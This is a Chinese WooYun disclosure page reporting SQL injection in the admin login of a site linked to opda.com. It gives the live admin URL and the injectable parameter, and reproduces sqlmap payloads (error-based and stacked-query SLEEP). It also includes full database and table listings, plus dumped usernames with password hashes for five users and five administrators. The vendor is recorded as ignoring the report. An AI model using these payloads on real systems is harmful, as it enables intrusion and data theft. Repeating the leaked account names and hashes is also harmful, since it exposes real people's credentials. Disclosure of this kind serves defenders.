当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120082

漏洞标题:卓大师某财富通道后台存在SQL注入导致全站约66W用户信息泄露

相关厂商:opda.com

漏洞作者:

提交时间:2015-06-15 10:42

修复时间:2015-06-20 10:44

公开时间:2015-06-20 10:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-15: 细节已通知厂商并且等待厂商处理中
2015-06-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

**

详细说明:

地址:http://opda.com:808/admin/
Post注入:

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: LoginForm[name]
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: LoginForm[name]=VFnL' AND (SELECT 6028 FROM(SELECT COUNT(*),CONCAT(
0x3a756e693a,(SELECT (CASE WHEN (6028=6028) THEN 1 ELSE 0 END)),0x3a76756d3a,FLO
OR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'FysW'=
'FysW&LoginForm[password]=&LoginForm[rememberMe]=0&LoginForm[rememberMe]=1&yt0=M
Xkk
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: LoginForm[name]=VFnL'; SELECT SLEEP(5)-- &LoginForm[password]=&Logi
nForm[rememberMe]=0&LoginForm[rememberMe]=1&yt0=MXkk
---


数据库信息:

available databases [3]:
[*] information_schema
[*] union
[*] unionext


列下union库的表:

Database: union
+---------------------------------------------+---------+
| Table                                       | Entries |
+---------------------------------------------+---------+
| union_box_device_activity_info              | 41377658 |
| union_box_package_201409                    | 6331391 |
| union_box_package_201408                    | 5939964 |
| union_box_package_201410                    | 5071400 |
| union_box_package_201411                    | 4702471 |
| union_user_profile                          | 4543115 |
| union_box_package_201412                    | 4384540 |
| union_box_package_201407                    | 4096623 |
| union_box_package_201406                    | 4016130 |
| union_box_package_201405                    | 3827715 |
| union_box_package_201501                    | 3487544 |
| union_box_package_device_5                  | 3365897 |
| union_box_package_device_11                 | 3149486 |
| union_box_package_device_14                 | 2839245 |
| union_box_package_device_20                 | 2804862 |
| union_box_package_device_9                  | 2739964 |
| union_box_package_201404                    | 2447405 |
| union_box_package_device_4                  | 2277520 |
| union_device_package_activity               | 2249515 |
| union_box_package_device_7                  | 2219302 |
| union_box_package_device_30                 | 2188893 |
| union_box_package_device_24                 | 2179516 |
| union_box_package_device_2                  | 2158687 |
| union_box_device                            | 2114819 |
| union_box_package_device_3                  | 2064208 |
| union_box_package_device_28                 | 1964883 |
| union_box_package_device_17                 | 1945388 |
| union_box_package_device_16                 | 1904566 |
| union_box_package_device_1                  | 1892674 |
| union_box_package_201403                    | 1879437 |
| union_box_package_201503                    | 1827626 |
| union_box_package_device_29                 | 1784853 |
| union_box_package_device_22                 | 1761815 |
| union_box_package_device_8                  | 1734412 |
| union_box_device_package_17                 | 1719511 |
| union_box_device_package_25                 | 1719363 |
| union_box_device_package_21                 | 1717730 |
| union_box_device_package_26                 | 1716969 |
| union_box_device_package_5                  | 1716791 |
| union_box_device_package_2                  | 1716732 |
| union_box_device_package_12                 | 1716313 |
| union_box_device_package_6                  | 1716000 |
| union_box_device_package_0                  | 1715929 |
| union_box_device_package_8                  | 1715889 |
| union_box_device_package_15                 | 1715852 |
| union_box_device_package_4                  | 1715851 |
| union_box_device_package_9                  | 1715849 |
| union_box_device_package_29                 | 1715840 |
| union_box_device_package_14                 | 1715429 |
| union_box_device_package_10                 | 1715048 |
| union_box_device_package_22                 | 1714943 |
| union_box_device_package_28                 | 1714541 |
| union_box_device_package_19                 | 1714492 |
| union_box_device_package_27                 | 1714440 |
| union_box_device_package_3                  | 1714413 |
| union_box_device_package_13                 | 1713997 |
| union_box_device_package_18                 | 1713950 |
| union_box_device_package_16                 | 1713720 |
| union_box_device_package_23                 | 1713713 |
| union_box_device_package_7                  | 1713633 |
| union_box_device_package_20                 | 1713518 |
| union_box_device_package_1                  | 1712908 |
| union_box_device_package_24                 | 1712287 |
| union_box_device_package_30                 | 1711576 |
| union_box_device_package_11                 | 1711549 |
| union_box_device_package_31                 | 1710952 |
| union_box_package_device_18                 | 1660959 |
| union_box_package_device_26                 | 1459927 |
| union_box_device_activity                   | 1422041 |
| union_box_package_device_10                 | 1403587 |
| union_box_package_201502                    | 1327321 |
| union_box_package_device_13                 | 1247180 |
| union_box_package_device_31                 | 1190973 |
| union_box_agent_count                       | 1180851 |
| union_box_package_device_27                 | 1164738 |
| union_box_package_201312                    | 1131076 |
| union_box_package_device_15                 | 1118080 |
| union_box_package_device_6                  | 997810  |
| union_box_device_activity_b_                | 945282  |
| union_box_device_activity_copy              | 943156  |
| union_box_package_201401                    | 900898  |
| union_box_package_201504                    | 868583  |
| union_box_package_device_12                 | 788771  |
| union_box_package_device_19                 | 786954  |
| union_box_package_201402                    | 717576  |
| union_box_device_activity_backup_2014_09_04 | 671978  |
| union_flashexp_package_device_15            | 665775  |
| union_old_device                            | 661954  |
| union_user                                  | 655018  |
| union_flashexp_package_device_20            | 644813  |
| union_box_package_device_21                 | 643112  |
| union_box_package_201310                    | 641752  |
| union_box_package_201311                    | 598472  |
| union_flashexp_package_device_1             | 586212  |
| union_box_device_tmp_20140705               | 580360  |
| union_box_package_device_25                 | 576467  |
| union_flashexp_package_device_10            | 560111  |
| union_flashexp_package_device_18            | 536558  |
| union_flashexp_package_device_4             | 519385  |
| union_flashexp_package_device_11            | 510646  |
| union_user_package_201307                   | 501421  |
| union_flashexp_package_device_26            | 499900  |
| union_box_package_device_23                 | 490015  |
| union_flashexp_package_device_22            | 487211  |
| union_flashexp_package_device_24            | 471522  |
| union_flashexp_package_device_17            | 446661  |
| union_user_package_201308                   | 444295  |
| union_district_ip                           | 442406  |
| union_box_package_device_0                  | 422596  |
| union_user_package_201303                   | 396701  |
| union_user_package_201403                   | 391183  |
| union_user_package_201301                   | 382857  |
| union_box_package_201505                    | 375305  |
| union_user_package_201306                   | 355040  |
| union_flashexp_package_device_6             | 344058  |
| union_flashexp_package_device_14            | 342462  |
| union_flashexp_device_package_16            | 305901  |
| union_flashexp_device_package_24            | 305702  |
| union_flashexp_device_package_11            | 305684  |
| union_flashexp_device_package_8             | 305637  |
| union_flashexp_device_package_5             | 305571  |
| union_flashexp_device_package_19            | 305514  |
| union_flashexp_device_package_4             | 305459  |
| union_flashexp_device_package_6             | 305457  |
| union_flashexp_device_package_20            | 305445  |
| union_user_package_201309                   | 305432  |
| union_flashexp_device_package_26            | 305412  |
| union_flashexp_device_package_7             | 305363  |
| union_flashexp_device_package_13            | 305338  |
| union_flashexp_device_package_18            | 305318  |
| union_flashexp_device_package_30            | 305249  |
| union_flashexp_device_package_9             | 305239  |
| union_flashexp_device_package_17            | 305140  |
| union_flashexp_device_package_27            | 305110  |
| union_flashexp_device_package_23            | 305016  |
| union_flashexp_device_package_15            | 305011  |
| union_flashexp_device_package_25            | 304967  |
| union_flashexp_device_package_2             | 304950  |
| union_flashexp_device_package_21            | 304942  |
| union_flashexp_device_package_12            | 304888  |
| union_flashexp_device_package_1             | 304868  |
| union_flashexp_device_package_0             | 304853  |
| union_flashexp_device_package_3             | 304843  |
| union_flashexp_device_package_14            | 304793  |
| union_flashexp_device_package_22            | 304585  |
| union_flashexp_device_package_29            | 304583  |
| union_flashexp_device_package_31            | 304535  |
| union_flashexp_device_package_28            | 304463  |
| union_flashexp_device_package_10            | 304435  |
| union_flashexp_package_device_28            | 294421  |
| union_user_package_setup_6                  | 293355  |
| union_box_package_arr_tmp                   | 292720  |
| union_flashexp_package_device_3             | 288629  |
| union_flashexp_device                       | 287734  |
| union_flashexp_package_device_30            | 286611  |
| union_user_package_201312                   | 279859  |
| union_flashexp_package_device_7             | 274305  |
| union_flashexp_package_device_2             | 266282  |
| union_user_package_201212                   | 261526  |
| union_user_package_201401                   | 259118  |
| union_flashexp_package_device_16            | 250089  |
| union_user_package_setup_14                 | 243044  |
| union_user_package_201305                   | 242908  |
| union_user_package_setup_11                 | 238782  |
| union_user_package_setup_29                 | 230474  |
| union_box_setup_201409                      | 227468  |
| union_user_package_201302                   | 218235  |
| union_flashexp_package_device_5             | 217550  |
| union_flashexp_package_device_9             | 217095  |
| union_flashexp_package_device_21            | 214055  |
| union_box_setup_201408                      | 210112  |
| union_user_package_setup_1                  | 190962  |
| union_box_setup_201410                      | 187343  |
| union_user_package_setup_23                 | 186091  |
| union_box_setup_201405                      | 183643  |
| union_user_package_setup_7                  | 183618  |
| union_flashexp_package_device_0             | 182978  |
| union_flashexp_package_device_29            | 180395  |
| union_user_package_201402                   | 178263  |
| union_user_package_201404                   | 175197  |
| union_user_package_201211                   | 173307  |
| union_user_package_201304                   | 172785  |
| union_user_package_setup_2                  | 170869  |
| union_user_package_setup_22                 | 169443  |
| union_box_setup_201411                      | 168748  |
| union_box_setup_201406                      | 166294  |
| union_user_package_201310                   | 165750  |
| union_device_package_6                      | 165307  |
| union_device_package_25                     | 164759  |
| union_device_package_0                      | 164090  |
| union_device_package_31                     | 163788  |
| union_device_package_4                      | 163752  |
| union_device_package_22                     | 163431  |
| union_device_package_29                     | 163263  |
| union_device_package_5                      | 163255  |
| union_device_package_27                     | 163113  |
| union_device_package_23                     | 163012  |
| union_device_package_1                      | 162899  |
| union_device_package_3                      | 162890  |
| union_device_package_15                     | 162861  |
| union_device_package_30                     | 162839  |
| union_device_package_16                     | 162829  |
| union_device_package_28                     | 162720  |
| union_device_package_17                     | 162425  |
| union_device_package_19                     | 162316  |
| union_device_package_7                      | 162243  |
| union_device_package_18                     | 162217  |
| union_device_package_10                     | 162158  |
| union_device_package_2                      | 161972  |
| union_device_package_12                     | 161933  |
| union_device_package_13                     | 161850  |
| union_device_package_21                     | 161746  |
| union_device_package_14                     | 161658  |
| union_device_package_20                     | 161493  |
| union_device_package_9                      | 161398  |
| union_device_package_26                     | 161321  |
| union_device_package_24                     | 161222  |
| union_device_package_8                      | 161036  |
| union_device_package_11                     | 160524  |
| union_box_setup_201407                      | 158762  |
| union_user_package_setup_15                 | 152084  |
| union_stat_device_uuid                      | 149903  |
| union_box_setup_201412                      | 145983  |
| union_user_package_setup_3                  | 140203  |
| union_flashexp_package_device_8             | 137444  |
| union_user_package_setup_26                 | 133561  |
| union_user_package_setup_31                 | 129125  |
| union_user_package_setup_0                  | 127092  |
| union_user_package_setup_20                 | 126469  |
| union_user_package_setup_17                 | 123370  |
| union_user_package_setup_8                  | 123138  |
| union_user_package_setup_19                 | 121940  |
| union_user_package_setup_28                 | 120758  |
| union_user_package_setup_25                 | 118419  |
| union_user_package_setup_5                  | 118257  |
| union_box_setup_201501                      | 118219  |
| union_uniondata_201401                      | 117573  |
| union_user_package_setup_30                 | 115940  |
| union_user_package_setup_9                  | 114483  |
| union_box_setup_201404                      | 113552  |
| union_user_package_setup_18                 | 112223  |
| union_uniondata_201403                      | 110405  |
| union_box_stat                              | 106957  |
| union_box_stat_bak_20150427                 | 105923  |
| union_user_package_201311                   | 105364  |
| union_user_package_setup_27                 | 105076  |
| union_stat_device_activity                  | 104094  |
| union_device                                | 101864  |
| union_stat_device                           | 101041  |
| union_box_setup_201403                      | 99151   |
| union_box_package_201309                    | 90474   |
| union_flashexp_package_device_12            | 89570   |
| union_user_package_setup_10                 | 86505   |
| union_flashexp_package_device_25            | 83547   |
| union_user_package_setup_21                 | 80942   |
| union_arrive_stat                           | 77912   |
| union_uniondata_201404                      | 77159   |
| union_user_package_setup_12                 | 76214   |
| union_box_stat_bak_20141201                 | 76151   |
| union_user_package_201405                   | 75536   |
| union_uniondata_201312                      | 72927   |
| union_box_package_201506                    | 71844   |
| union_flashexp_package_device_19            | 69661   |
| union_user_package_setup_16                 | 67586   |
| union_box_setup_201503                      | 64757   |
| union_box_setup_201312                      | 63009   |
| union_user_package_setup_4                  | 62347   |
| union_arrive_stat_copy                      | 59866   |
| union_user_package_201208                   | 58324   |
| union_box_agent_stat                        | 57486   |
| union_user_package_201209                   | 56730   |
| union_uniondata_201402                      | 56725   |
| union_user_package_setup_13                 | 56679   |
| union_box_stat_tmp                          | 55717   |
| union_user_package_201406                   | 53975   |
| union_box_setup_201401                      | 53556   |
| union_user_package_201504                   | 52648   |
| union_flash_device                          | 50682   |
| union_user_package_201407                   | 49743   |
| union_user_package_setup_24                 | 49402   |
| union_attachment                            | 49242   |
| union_user_package_201408                   | 49080   |
| union_uniondata_201405                      | 48849   |
| union_uniondata_201504                      | 48545   |
| union_box_setup_201502                      | 46570   |
| union_box_package_setup_6                   | 46425   |
| union_district                              | 45051   |
| union_old_device_model                      | 42711   |
| union_flashexp_package_device_13            | 42481   |
| union_box_device_setup_25                   | 42265   |
| union_box_device_setup_4                    | 42261   |
| union_box_device_setup_15                   | 42254   |
| union_box_device_setup_22                   | 42254   |
| union_box_device_setup_1                    | 42246   |
| union_box_device_setup_30                   | 42246   |
| union_box_device_setup_23                   | 42240   |
| union_box_device_setup_24                   | 42231   |
| union_box_device_setup_8                    | 42231   |
| union_box_device_setup_19                   | 42224   |
| union_box_device_setup_31                   | 42222   |
| union_box_device_setup_9                    | 42220   |
| union_box_device_setup_26                   | 42219   |
| union_box_device_setup_18                   | 42217   |
| union_box_device_setup_21                   | 42215   |
| union_box_device_setup_5                    | 42215   |
| union_box_device_setup_7                    | 42213   |
| union_box_device_setup_27                   | 42211   |
| union_box_device_setup_17                   | 42210   |
| union_box_device_setup_2                    | 42209   |
| union_box_device_setup_12                   | 42206   |
| union_box_device_setup_13                   | 42204   |
| union_box_device_setup_11                   | 42200   |
| union_box_device_setup_0                    | 42199   |
| union_box_device_setup_6                    | 42197   |
| union_box_device_setup_14                   | 42195   |
| union_box_device_setup_28                   | 42194   |
| union_box_device_setup_10                   | 42191   |
| union_box_device_setup_16                   | 42189   |
| union_box_device_setup_20                   | 42189   |
| union_box_device_setup_3                    | 42184   |
| union_box_device_setup_29                   | 42181   |
| union_uniondata_201407                      | 42046   |
| union_box_agent_stat_bak_20141201           | 39046   |
| union_user_package_201503                   | 38325   |
| union_uniondata_201406                      | 37806   |
| union_user_package_201210                   | 37241   |
| union_uniondata_201408                      | 36758   |
| union_box_package_setup_4                   | 35486   |
| union_box_setup_201402                      | 34876   |
| union_uniondata_201503                      | 34866   |
| union_user_package_201410                   | 34579   |
| union_flashexp_package_device_23            | 34023   |
| union_box_package_setup_5                   | 33174   |
| union_user_group_review                     | 32808   |
| union_package_stat_6                        | 32788   |
| union_box_setup_201504                      | 32627   |
| union_box_setup_201310                      | 31890   |
| union_user_package_201505                   | 31832   |
| union_package_stat_5                        | 30619   |
| union_box_setup_201311                      | 28976   |
| union_user_package_201409                   | 27490   |
| union_uniondata_201410                      | 25118   |
| union_flash_setup_201501                    | 24735   |
| union_user_package_201411                   | 24697   |
| union_box_package_setup_2                   | 24167   |
| union_user_package_201502                   | 21309   |
| union_package_stat_4                        | 19396   |
| union_package_stat_7                        | 19175   |
| union_uniondata_201502                      | 18846   |
| union_uniondata_201411                      | 18719   |
| union_package_stat_0                        | 17849   |
| union_package_stat_3                        | 16960   |
| union_user_package_stat_6                   | 16732   |
| union_package_stat_2                        | 16713   |
| union_user_package_stat_1                   | 16218   |
| union_uniondata_201311                      | 15965   |
| union_uniondata_201505                      | 15664   |
| union_user_package_201412                   | 15277   |
| union_flash_setup_201502                    | 15035   |
| union_flashexp_package_device_27            | 14757   |
| union_user_package_stat_7                   | 14650   |
| union_box_setup_201505                      | 14584   |
| union_box_package_setup_3                   | 14304   |
| union_flash_device_activity                 | 14207   |
| union_uniondata_201409                      | 13645   |
| union_user_package_stat_5                   | 13612   |
| union_package_stat_1                        | 13322   |
| union_user_package_stat_2                   | 13041   |
| union_user_package_stat_4                   | 12870   |
| union_user_info                             | 12283   |
| union_user_package_stat_3                   | 12088   |
| union_box_package_setup_0                   | 11687   |
| union_user_major_relative                   | 11498   |
| union_user_package_stat_0                   | 10829   |
| union_uniondata_201412                      | 9733    |
| union_box_package_setup_7                   | 9163    |
| union_user_package_201506                   | 8638    |
| union_device_package_model_activity         | 8531    |
| union_user_package_201501                   | 7918    |
| union_tongbu_legal                          | 7603    |
| union_flash_setup_201412                    | 6564    |
| union_user_account_checkout                 | 6378    |
| union_attach_4                              | 6158    |
| union_attach_1                              | 6148    |
| union_attach_2                              | 6148    |
| union_attach_8                              | 6147    |
| union_attach_7                              | 6146    |
| union_attach_3                              | 6145    |
| union_attach_5                              | 6144    |
| union_attach_6                              | 6144    |
| union_box_setup_201309                      | 5844    |
| union_box_account_checkout                  | 5728    |
| union_uniondata_201506                      | 5658    |
| union_flashexp_package_device_31            | 5326    |
| union_temp_user_stat                        | 4991    |
| union_old_device_release                    | 4864    |
| union_uniondata_201501                      | 4858    |
| union_package_ad_count                      | 4604    |
| union_flashexp_stat                         | 4514    |
| union_flash_setup_201503                    | 4212    |
| union_flash_rom_package                     | 3978    |
| union_user_return_profile                   | 3621    |
| union_user_bank                             | 3541    |
| union_user_lostpass                         | 3098    |
| union_box_setup_201506                      | 2740    |
| union_tongbu_pirate                         | 2387    |
| union_flashexp_stat_copy2                   | 2086    |
| union_user_package_201207                   | 2074    |
| union_flashexp_stat_copy1                   | 1905    |
| union_flashexp_stat_copy                    | 1807    |
| union_box_device_model                      | 1644    |
| union_stat_device_info_0                    | 1579    |
| union_stat_device_info_1                    | 1579    |
| union_stat_device_info_10                   | 1579    |
| union_stat_device_info_11                   | 1579    |
| union_stat_device_info_12                   | 1579    |
| union_stat_device_info_13                   | 1579    |
| union_stat_device_info_14                   | 1579    |
| union_stat_device_info_15                   | 1579    |
| union_stat_device_info_16                   | 1579    |
| union_stat_device_info_17                   | 1579    |
| union_stat_device_info_18                   | 1579    |
| union_stat_device_info_19                   | 1579    |
| union_stat_device_info_2                    | 1579    |
| union_stat_device_info_20                   | 1579    |
| union_stat_device_info_21                   | 1579    |
| union_stat_device_info_22                   | 1579    |
| union_stat_device_info_23                   | 1579    |
| union_stat_device_info_24                   | 1579    |
| union_stat_device_info_25                   | 1579    |
| union_stat_device_info_26                   | 1579    |
| union_stat_device_info_27                   | 1579    |
| union_stat_device_info_28                   | 1579    |
| union_stat_device_info_3                    | 1579    |
| union_stat_device_info_4                    | 1579    |
| union_stat_device_info_43                   | 1579    |
| union_stat_device_info_44                   | 1579    |
| union_stat_device_info_45                   | 1579    |
| union_stat_device_info_46                   | 1579    |
| union_stat_device_info_47                   | 1579    |
| union_stat_device_info_49                   | 1579    |
| union_stat_device_info_5                    | 1579    |
| union_stat_device_info_52                   | 1579    |
| union_stat_device_info_53                   | 1579    |
| union_stat_device_info_54                   | 1579    |
| union_stat_device_info_55                   | 1579    |
| union_stat_device_info_56                   | 1579    |
| union_stat_device_info_57                   | 1579    |
| union_stat_device_info_58                   | 1579    |
| union_stat_device_info_59                   | 1579    |
| union_stat_device_info_6                    | 1579    |
| union_stat_device_info_60                   | 1579    |
| union_stat_device_info_61                   | 1579    |
| union_stat_device_info_62                   | 1579    |
| union_stat_device_info_63                   | 1579    |
| union_stat_device_info_7                    | 1579    |
| union_stat_device_info_8                    | 1579    |
| union_stat_device_info_9                    | 1579    |
| union_stat_device_info_29                   | 1578    |
| union_stat_device_info_30                   | 1578    |
| union_stat_device_info_31                   | 1578    |
| union_stat_device_info_32                   | 1578    |
| union_stat_device_info_33                   | 1578    |
| union_stat_device_info_34                   | 1578    |
| union_stat_device_info_35                   | 1578    |
| union_stat_device_info_36                   | 1578    |
| union_stat_device_info_37                   | 1578    |
| union_stat_device_info_38                   | 1578    |
| union_stat_device_info_39                   | 1578    |
| union_stat_device_info_40                   | 1578    |
| union_stat_device_info_41                   | 1578    |
| union_stat_device_info_42                   | 1578    |
| union_stat_device_info_48                   | 1578    |
| union_stat_device_info_50                   | 1578    |
| union_stat_device_info_51                   | 1578    |
| union_box_package_setup_1                   | 1391    |
| union_flash_rom_list                        | 1255    |
| union_content_0625                          | 1214    |
| union_user_agent                            | 1207    |
| union_flash_setup_temp                      | 1060    |
| union_box_model_able                        | 1055    |
| union_package_box                           | 908     |
| union_package                               | 899     |
| union_flash_rom_list_copy                   | 890     |
| union_user_package_yijifen                  | 634     |
| union_flash_phoneinfo                       | 467     |
| union_user_package_op                       | 457     |
| union_box_stat_temp                         | 434     |
| union_discount                              | 360     |
| union_box_agent                             | 339     |
| union_box_agent_bank                        | 322     |
| union_user_box_agent_realtion               | 315     |
| union_user_tianji_201405                    | 292     |
| union_box_device_brand                      | 273     |
| union_brand                                 | 270     |
| union_brand_copy                            | 269     |
| union_user_cheat                            | 235     |
| union_user_ask                              | 233     |
| union_box                                   | 208     |
| union_box_device_vendor                     | 206     |
| union_user_return_deduct                    | 206     |
| union_box_plan_relative                     | 172     |
| union_user_agent_copy                       | 152     |
| union_flash_setup_201411                    | 136     |
| union_flash_rom                             | 130     |
| union_content                               | 122     |
| union_content_category                      | 116     |
| union_box_plan_custom                       | 114     |
| union_user_article                          | 111     |
| union_setup_stat_info                       | 100     |
| union_box_agent_relative                    | 79      |
| union_admin_user                            | 74      |
| union_box_status                            | 64      |
| union_package_ad                            | 50      |
| union_user_inv_package                      | 42      |
| union_setup_stat_info_copy                  | 39      |
| union_user_tianji_201406                    | 38      |
| union_box_device_release                    | 34      |
| union_package_district                      | 34      |
| union_admin_apartment                       | 33      |
| union_app_info                              | 33      |
| union_user_major                            | 32      |
| union_box_plan                              | 22      |
| union_screen_adaptation                     | 20      |
| union_attach_type                           | 19      |
| union_box_device_inf                        | 16      |
| union_box_model_price                       | 16      |
| union_box_custom_plan                       | 15      |
| union_uniondata_201310                      | 12      |
| union_box_model_ram                         | 10      |
| union_box_model_screen                      | 10      |
| union_package_tianji                        | 7       |
| union_user_level                            | 7       |
| union_box_model_operators                   | 6       |
| union_flashexp_plan                         | 6       |
| union_settlement_package                    | 6       |
| union_user_group                            | 6       |
| union_box_model_cpus                        | 5       |
| union_box_model_rom                         | 5       |
| union_phone_device_uuid                     | 5       |
| union_settlement_operation                  | 5       |
| union_box_discount                          | 4       |
| union_flash_user_link                       | 4       |
| union_martial                               | 4       |
| union_app_version                           | 3       |
| union_clearing_type                         | 3       |
| union_cp_admin                              | 3       |
| union_phone_device                          | 3       |
| union_user_ask_type                         | 3       |
| union_apps                                  | 2       |
| union_box_apartment_bank                    | 2       |
| union_device_activation_range               | 2       |
| union_flash_delapp                          | 2       |
| union_language                              | 2       |
| union_package_plan_tj                       | 2       |
| union_box_agent_price                       | 1       |
| union_box_arrive_discount                   | 1       |
| union_flashexp_memory                       | 1       |
| union_martial_user                          | 1       |
| union_phone_device_info_1                   | 1       |
| union_phone_device_info_2                   | 1       |
| union_phone_device_info_3                   | 1       |
| union_phone_device_info_4                   | 1       |
| union_phone_device_info_5                   | 1       |
| union_user_tianji_201407                    | 1       |
+---------------------------------------------+---------+


可以看出约66W用户信息泄露:

| union_user                                  | 655018  |


列下表列结构:

[9 columns]
+------------+------------+
| Column     | Type       |
+------------+------------+
| from       | tinyint(4) |
| app_id     | int(11)    |
| channel_id | int(11)    |
| ctime      | timestamp  |
| developer  | tinyint(1) |
| email      | char(40)   |
| id         | int(11)    |
| password   | char(32)   |
| username   | char(20)   |
+------------+------------+


列前5位用户信息:

Database: union
Table: union_user
[5 entries]
+----------------+----------------------------------+
| username       | password                         |
+----------------+----------------------------------+
| dashi581753257 | 0000221dbaf7626e974b75dc9c5f09b4 |
| dashi424979190 | 0000bd833f5adde588eda552586f7df8 |
| dashi527066812 | 0000fa1cd6d6eb619e9ecfe4a400955a |
| qq483198705    | 0001158ffb4a9ce104ca4568d58fea52 |
| qq1093066156   | 00012586a72349937b3fea2c1e957bc1 |
+----------------+----------------------------------+


管理表:

Table: union_admin_user
[12 columns]
+---------------+---------------------------------------+
| Column        | Type                                  |
+---------------+---------------------------------------+
| adv_user      | tinyint(4)                            |
| apartment     | tinyint(4)                            |
| box_id        | varchar(200)                          |
| ctime         | timestamp                             |
| email         | varchar(45)                           |
| history_boxes | varchar(512)                          |
| id            | int(11)                               |
| nickname      | varchar(10)                           |
| password      | varchar(32)                           |
| permission    | enum('0','1','2','3','4','5','7','6') |
| show_flag     | tinyint(4)                            |
| username      | varchar(20)                           |
+---------------+---------------------------------------+


管理员信息:

Database: union
Table: union_admin_user
[5 entries]
+-----------+----------------------------------+
| username  | password                         |
+-----------+----------------------------------+
| zww       | 0097430055f15ba3edd58f2bcad91973 |
| tongcheng | 0097430055f15ba3edd58f2bcad91973 |
| ds_002    | 0a3256489b4ebf265da92fd425b41356 |
| ds_001    | 0a3256489b4ebf265da92fd425b41356 |
| zyadmin   | 0c046b8b81fda93d4d9e9ad1e9cdd2a8 |
+-----------+----------------------------------+


漏洞证明:

修复方案:

**

版权声明:转载请注明来源 @乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-20 10:44

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论